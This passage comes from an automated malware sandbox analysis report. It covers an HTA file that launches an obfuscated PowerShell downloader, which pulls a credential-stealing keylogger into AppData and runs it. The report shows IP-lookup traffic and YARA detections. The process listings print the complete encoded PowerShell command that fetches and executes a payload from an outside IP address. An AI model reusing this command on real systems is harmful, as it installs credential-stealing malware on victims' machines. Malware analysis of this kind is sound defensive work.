                                                                                  Data Ascii: }ElHME36@$H5RLftRL5RLQ_^]U,VWM;3EEEPh4HEPu0HRL3bLG;EPQhRLhRL6bLRLbLEEPPh5RL`H


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.649688132.226.247.73807568C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 11, 2025 09:21:37.497594118 CET151OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Mar 11, 2025 09:21:38.183032036 CET273INHTTP/1.1 200 OK
                                                                                  Date: Tue, 11 Mar 2025 08:21:38 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 104
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                  Mar 11, 2025 09:21:38.434036016 CET127OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Mar 11, 2025 09:21:38.644768953 CET273INHTTP/1.1 200 OK
                                                                                  Date: Tue, 11 Mar 2025 08:21:38 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 104
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                  HTTPS Proxied Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.649689104.21.80.14437568C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-03-11 08:21:41 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  Connection: Keep-Alive
                                                                                  2025-03-11 08:21:41 UTC852INHTTP/1.1 200 OK
                                                                                  Date: Tue, 11 Mar 2025 08:21:41 GMT
                                                                                  Content-Type: text/xml
                                                                                  Content-Length: 362
                                                                                  Connection: close
                                                                                  Age: 43
                                                                                  Cache-Control: max-age=31536000
                                                                                  cf-cache-status: HIT
                                                                                  last-modified: Tue, 11 Mar 2025 08:20:58 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mq72nktKT80XW%2BQ5ASAEuHJ9qMMvC8Esu32108brlKhTxA2b3pI2rqdw11Xaz4yIDi5UfDfgh2ipISd%2FAY1quiyKzSJ6el1KZzCQNxlRUtnLRUOv5%2FCnMjcdNIsPr0YbPMJPmWxc"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 91e9a3c6182469e3-LAS
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=46397&min_rtt=8233&rtt_var=26477&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=351755&cwnd=250&unsent_bytes=0&cid=6b4e1d54f3c32620&ts=646&x=0"
                                                                                  2025-03-11 08:21:41 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:04:21:24
                                                                                  Start date:11/03/2025
                                                                                  Path:C:\Windows\SysWOW64\mshta.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:mshta.exe "C:\Users\user\Desktop\kissingwithbestexperiencedgirlfriendonhereformenice.hta"
                                                                                  Imagebase:0x250000
                                                                                  File size:13'312 bytes
                                                                                  MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:1
                                                                                  Start time:04:21:25
                                                                                  Start date:11/03/2025
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\system32\cmd.exe" "/C poWERsHElL.eXe -ex BypasS -Nop -w 1 -c DevIcecredEntIalDEPLOYmENT.eXE ; Iex($(iEx('[sYsTeM.texT.enCodING]'+[chAR]58+[Char]0x3A+'Utf8.gEtstriNG([sYStEm.cOnveRt]'+[CHaR]0X3A+[cHaR]0x3A+'fRombase64strIng('+[chaR]0x22+'JFhUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlUkRFZkluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEp6ZkhCcFVUcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaTXBrLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpVmFWY0lOWG8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVZuYW9lKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQmlzVkFURm9zIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTd0N6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC81NjAvdmNjLmV4ZSIsIiRlTnY6QVBQREFUQVx2Y2MuZXhlIiwwLDApO1NUQXJ0LXNMZWVQKDMpO0lOVm9LZS1JVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx2Y2MuZXhlIg=='+[chAr]0x22+'))')))"
                                                                                  Imagebase:0x2a0000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:2
                                                                                  Start time:04:21:25
                                                                                  Start date:11/03/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff68dae0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:3
                                                                                  Start time:04:21:25
                                                                                  Start date:11/03/2025
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:poWERsHElL.eXe -ex BypasS -Nop -w 1 -c DevIcecredEntIalDEPLOYmENT.eXE ; Iex($(iEx('[sYsTeM.texT.enCodING]'+[chAR]58+[Char]0x3A+'Utf8.gEtstriNG([sYStEm.cOnveRt]'+[CHaR]0X3A+[cHaR]0x3A+'fRombase64strIng('+[chaR]0x22+'JFhUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlUkRFZkluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEp6ZkhCcFVUcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaTXBrLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpVmFWY0lOWG8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVZuYW9lKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQmlzVkFURm9zIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTd0N6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC81NjAvdmNjLmV4ZSIsIiRlTnY6QVBQREFUQVx2Y2MuZXhlIiwwLDApO1NUQXJ0LXNMZWVQKDMpO0lOVm9LZS1JVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx2Y2MuZXhlIg=='+[chAr]0x22+'))')))"
                                                                                  Imagebase:0x260000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:8
                                                                                  Start time:04:21:28
                                                                                  Start date:11/03/2025
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfzuxwqd\qfzuxwqd.cmdline"
                                                                                  Imagebase:0x870000
                                                                                  File size:2'141'552 bytes
                                                                                  MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:9
                                                                                  Start time:04:21:28
                                                                                  Start date:11/03/2025
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES94CA.tmp" "c:\Users\user\AppData\Local\Temp\qfzuxwqd\CSCADD237997B8E4BD496D9E414C49E4A6C.TMP"
                                                                                  Imagebase:0x8e0000
                                                                                  File size:46'832 bytes
                                                                                  MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:11
                                                                                  Start time:04:21:34
                                                                                  Start date:11/03/2025
                                                                                  Path:C:\Users\user\AppData\Roaming\vcc.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Roaming\vcc.exe"
                                                                                  Imagebase:0x30000
                                                                                  File size:965'120 bytes
                                                                                  MD5 hash:0FD138D0A654100FD6E3CCDEBCE396A3
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000B.00000002.1361313297.0000000003290000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1361313297.0000000003290000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 0000000B.00000002.1361313297.0000000003290000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.1361313297.0000000003290000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.1361313297.0000000003290000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000B.00000002.1361313297.0000000003290000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 75%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:12
                                                                                  Start time:04:21:35
                                                                                  Start date:11/03/2025
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Roaming\vcc.exe"
                                                                                  Imagebase:0x200000
                                                                                  File size:45'984 bytes
                                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000C.00000002.2495361792.00000000003D2000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2495361792.00000000003D2000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 0000000C.00000002.2495361792.00000000003D2000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.2495361792.00000000003D2000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000002.2495361792.00000000003D2000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2497932312.0000000002936000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Disassembly

                                                                                  Reset < >